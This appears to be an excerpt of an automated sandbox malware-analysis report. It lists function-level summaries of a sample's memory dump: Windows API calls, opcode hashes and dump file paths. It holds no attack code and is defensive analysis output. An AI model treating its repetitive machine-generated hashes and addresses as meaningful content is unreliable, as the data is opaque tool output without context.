                                                                                              • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                                              • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                                                                              APIs
                                                                                              • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                                                              • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                                                              • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                                                              • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                                                              • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                                                              • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Show$Enable$MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 642888154-0
                                                                                              • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                              • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                                                              • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                              • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$Copy$ClearErrorLast
                                                                                              • String ID: NULL Pointer assignment$Not an Object type
                                                                                              • API String ID: 2487901850-572801152
                                                                                              • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                              • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                                                                              • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                              • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                                                              • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                              • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                              • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                              • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                              • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Enable$Show$MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 1871949834-0
                                                                                              • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                                              • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                                                                              • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                                              • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                              • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                                                              • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                              • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                                                              APIs
                                                                                              • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                                                              • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                                                              • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                                                              • SendMessageW.USER32 ref: 00471AE3
                                                                                              • DestroyIcon.USER32(?), ref: 00471AF4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                                                              • String ID:
                                                                                              • API String ID: 3611059338-0
                                                                                              • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                                              • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                                                              • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                                              • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: DestroyWindow$DeleteObject$IconMove
                                                                                              • String ID:
                                                                                              • API String ID: 1640429340-0
                                                                                              • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                                              • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                                                                              • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                                              • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                                                                              APIs
                                                                                                • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                              • _wcslen.LIBCMT ref: 004438CD
                                                                                              • _wcslen.LIBCMT ref: 004438E6
                                                                                              • _wcstok.LIBCMT ref: 004438F8
                                                                                              • _wcslen.LIBCMT ref: 0044390C
                                                                                              • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                                                              • _wcstok.LIBCMT ref: 00443931
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                                                              • String ID:
                                                                                              • API String ID: 3632110297-0
                                                                                              • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                                              • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                                                                              • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                                              • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                                              • String ID:
                                                                                              • API String ID: 752480666-0
                                                                                              • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                                              • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                                                                              • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                                              • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                              • String ID:
                                                                                              • API String ID: 3275902921-0
                                                                                              • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                                              • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                                                                              • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                                              • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                              • String ID:
                                                                                              • API String ID: 3275902921-0
                                                                                              • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                                              • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                                                                              • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                                              • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                                                                              APIs
                                                                                              • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                                                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                              • String ID:
                                                                                              • API String ID: 2833360925-0
                                                                                              • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                                              • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                                                                              • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                                              • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                                                                              APIs
                                                                                              • SendMessageW.USER32 ref: 004555C7
                                                                                              • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                                                                              • DeleteObject.GDI32(?), ref: 00455736
                                                                                              • DeleteObject.GDI32(?), ref: 00455744
                                                                                              • DestroyIcon.USER32(?), ref: 00455752
                                                                                              • DestroyWindow.USER32(?), ref: 00455760
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3691411573-0
                                                                                              • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                                              • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                                                                                              • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                                              • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                                                                                              APIs
                                                                                                • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                              • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                                                              • LineTo.GDI32(?,?,?), ref: 004472AC
                                                                                              • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                                                              • LineTo.GDI32(?,?,?), ref: 004472C6
                                                                                              • EndPath.GDI32(?), ref: 004472D6
                                                                                              • StrokePath.GDI32(?), ref: 004472E4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                                              • String ID:
                                                                                              • API String ID: 372113273-0
                                                                                              • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                                              • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                                                                              • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                                              • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                                                                              APIs
                                                                                              • GetDC.USER32(00000000), ref: 0044CC6D
                                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                                                              • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                                                              • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsDevice$Release
                                                                                              • String ID:
                                                                                              • API String ID: 1035833867-0
                                                                                              • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                                              • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                                                                              • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                                              • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                                                                              APIs
                                                                                              • __getptd.LIBCMT ref: 0041708E
                                                                                                • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                                                • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                                              • __amsg_exit.LIBCMT ref: 004170AE
                                                                                              • __lock.LIBCMT ref: 004170BE
                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                                                                              • _free.LIBCMT ref: 004170EE
                                                                                              • InterlockedIncrement.KERNEL32(02E92D08), ref: 00417106
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                              • String ID:
                                                                                              • API String ID: 3470314060-0
                                                                                              • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
